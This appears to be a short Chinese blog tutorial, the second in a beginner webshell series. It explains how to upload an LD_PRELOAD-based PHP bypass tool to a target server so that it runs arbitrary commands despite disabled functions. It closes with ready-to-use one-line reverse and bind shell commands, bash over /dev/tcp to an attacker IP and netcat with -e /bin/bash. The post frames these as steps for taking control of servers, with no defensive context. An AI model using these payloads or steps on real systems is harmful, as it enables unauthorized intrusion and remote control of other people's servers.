webshell入门(二)

webshell绕安全模式执行命令

  上一次讲了利用java的runtime.exce()方法执行任意代码,但是必然会受到各种杀毒软件的监控,本次学习一个绕过杀毒软件的webshell

  参考网址:https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

在上面网址下载下安装包

webshell入门(二)
把上图中的php和so文件上传到目标服务器上去,当我们访问该php页面。可以执行任意代码

webshell入门(二)
根据提示,把参数传入

webshell入门(二)
如上图:即可执行任意代码

ps:linux一行代码反弹webshell

1、 反向向反弹shell:
靶机: bash -i >& /dev/tcp/192.168.0.128/6666 0>&1
攻击机器: nc -lvp 6666

2、正向向反弹shell:
靶机: nc -lvvp 8888 -e /bin/bash
攻击机器: nc 192.168.0.128 8888

相关文章:

  • 2022-12-23
  • 2021-07-08
  • 2021-10-19
  • 2022-12-23
  • 2021-12-04
  • 2021-12-04
  • 2021-08-13
  • 2021-06-02
猜你喜欢
  • 2022-02-11
  • 2021-12-06
  • 2021-12-06
  • 2022-12-23
  • 2022-02-26
  • 2021-07-22
相关资源
相似解决方案
热门标签
Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode